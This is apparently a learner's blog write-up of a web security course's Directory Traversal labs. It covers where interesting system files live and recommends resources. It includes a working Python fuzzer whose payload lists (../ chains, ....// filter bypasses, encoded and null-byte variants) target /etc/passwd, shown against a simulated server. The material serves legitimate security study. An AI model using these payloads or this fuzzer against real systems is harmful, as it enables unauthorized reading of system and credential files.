Alright, first things first: I would bump this to position 1 in the learning path. Why? Lower barrier to entry than the SQLi section (not everyone has used SQL, but I think you’d be hard-pressed to find someone who has used a computer but hasn’t navigated through files and directories). The labs in this section were also very straightforward and could be completed with just the information in the content provided. There are also only 4 labs, which makes it easier to build momentum than the SQLi section. I understand starting with SQLi, but right now I would start with Directory Traversal and then do Command Injection (I’ll touch on that one when I do the takeaways for that section). I may change things as I get through the other sections, and hopefully I’ll remember to put a recommended order up at some point.
I think the biggest takeaway I had from this section was to know where the default locations are for interesting files across operating systems. I remember when I first started looking at infosec stuff wondering about /etc/passwd and how people knew to go there. Coming from a very Windows-focused background, that gave me pause. The various team manuals available (Purple Team Field Manual, Blue Team Field Manual, Red Team Field Manual – which has recently been updated as the Red Team Reference Manual) are good places to start. I haven’t dug through all of mine to see what the differences are, but I’d get the purple team one to start if I didn’t have any. Just remember those are references, NOT how-to books, so they don’t do you a ton of good if you aren’t sure at all what you need. This How To Geek article gives a good Linux overview. Mubix’s post-exploitation-wiki has the important file locations for Windows (and a bunch of other great information).
Otherwise, be sure to look at locations that aren’t necessarily high value – you might not be able to hit gold with /etc/shadow, but you might be able to access other locations with valuable info. If you have the Web Application Hacker’s Handbook, definitely review the associated section (path traversal). Burp Pro has a really good fuzzing list for directory traversal to automate some things easily. Also check out the OWASP resources. Of course, you should probably just have OWASP bookmarked anyways.
Scripting these labs wasn’t really a necessary thing, but I did anyways. I basically built a very simple fuzzing script by building 1 lab upon the next. I definitely have ideas of how to improve on what I have, but building them out this way was kind of fun and helped me approach the labs in Command Injection more efficiently. It also kind of helped internalize the things to try/look for with Directory Traversal. Being able to store different fuzzing options in Python lists and use them to target specific website parameters is helpful. I’m generally a fan of using available tooling when it works well (like Burp Pro – I’ve seen enough through 4 sections of the learning path that I would recommend finding a way to buy it) because it frees you up to do other things, but the practice on small things like this can help down the line when you need to customize things or want to build your own tools.
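To make the "payloads in Python lists, aimed at one parameter" idea concrete, here is an added example of that kind of script. It is not the author’s script and not anything from the Web Security Academy; the lab URL, the `filename` parameter name and the fake vulnerable endpoint are all assumptions so the code runs offline. The payload list covers the bypasses the labs teach (plain `../`, `....//` against single-pass stripping, single and double URL-encoding, an absolute path, a null byte before a required extension), and the stand-in server models only the "traversal sequences stripped non-recursively" defence, so only the `....//` payloads come back as hits.

```python
"""Constructed example: a minimal directory-traversal fuzzer.
Payloads live in Python lists, one request per payload against a single
parameter, and a hit is recognised by a marker only the target file contains."""
import posixpath
import urllib.parse
import urllib.request
from typing import Callable, Iterable, List

TARGET = "etc/passwd"          # file to read, relative to the filesystem root
SUCCESS_MARKER = "root:x:0:0"  # present in /etc/passwd, not in an image or error page


def traversal_payloads(target: str = TARGET, max_depth: int = 6) -> List[str]:
    """Candidate values for the vulnerable parameter. Pre-encoded entries
    (%2e...) must reach the server exactly as written, so build_url below
    deliberately does not re-encode them."""
    payloads: List[str] = []
    for depth in range(1, max_depth + 1):
        payloads.append("../" * depth + target)               # ../../etc/passwd
        payloads.append("....//" * depth + target)            # one strip pass of '../' leaves '../'
        payloads.append("%2e%2e%2f" * depth + target)         # decoded once by the web server
        payloads.append("%252e%252e%252f" * depth + target)   # survives if the app decodes again
    payloads.append("/" + target)                             # absolute path, if the base dir is not enforced
    payloads.append("../" * max_depth + target + "%00.png")   # null byte ends the name before '.png'
    return payloads


def build_url(base: str, param: str, payload: str) -> str:
    """Put `payload` into `param` without touching it; other query parameters
    in `base` are kept and encoded normally."""
    parts = urllib.parse.urlsplit(base)
    others = [(k, v) for k, v in urllib.parse.parse_qsl(parts.query, keep_blank_values=True)
              if k != param]
    query = urllib.parse.urlencode(others)
    query = f"{query}&{param}={payload}" if query else f"{param}={payload}"
    return urllib.parse.urlunsplit((parts.scheme, parts.netloc, parts.path, query, ""))


def http_fetch(url: str) -> str:
    """Real fetcher for use against a lab; not used by the offline demo."""
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")


def fuzz_parameter(base: str, param: str, payloads: Iterable[str],
                   fetch: Callable[[str], str] = http_fetch,
                   marker: str = SUCCESS_MARKER) -> List[str]:
    """Send every payload and return the ones whose response contains the marker."""
    hits: List[str] = []
    for payload in payloads:
        try:
            body = fetch(build_url(base, param, payload))
        except (OSError, ValueError):   # URLError/HTTPError are OSError subclasses
            continue
        if marker in body:
            hits.append(payload)
    return hits


# --- Offline stand-in for a vulnerable endpoint (constructed, not a real site) ---
IMAGE_DIR = "/var/www/images"
FAKE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
               "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n")   # constructed content


def simulate_lab_server(url: str) -> str:
    """Mimics an app that strips '../' in a single pass: the parameter is
    URL-decoded once (as a web server would), literal '../' is removed once,
    then the path is resolved under IMAGE_DIR. Only '....//' survives this."""
    parts = urllib.parse.urlsplit(url)
    params = dict(urllib.parse.parse_qsl(parts.query, keep_blank_values=True))
    cleaned = params.get("filename", "").replace("../", "")
    resolved = posixpath.normpath(IMAGE_DIR + "/" + cleaned)
    return FAKE_PASSWD if resolved == "/etc/passwd" else "No such file"


def demo() -> List[str]:
    base = "https://example.invalid/image?filename=1.jpg"   # assumed lab URL and parameter
    return fuzz_parameter(base, "filename", traversal_payloads(), fetch=simulate_lab_server)


if __name__ == "__main__":
    for hit in demo():
        print("HIT:", hit)
```

Against a real lab you would swap `simulate_lab_server` for `http_fetch` (or a `requests` session with the lab cookie) and change the marker for whatever file you are after. The one design point worth copying is in `build_url`: if you let a URL library encode the query for you, `%2e%2e%2f` silently becomes `%252e%252e%252f` and the single-encoded case is never actually tested.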
Short and sweet section. Fun labs that got the concept across. The entire section could be done with the Community version, but Pro would come in handy for the fuzzing aspect.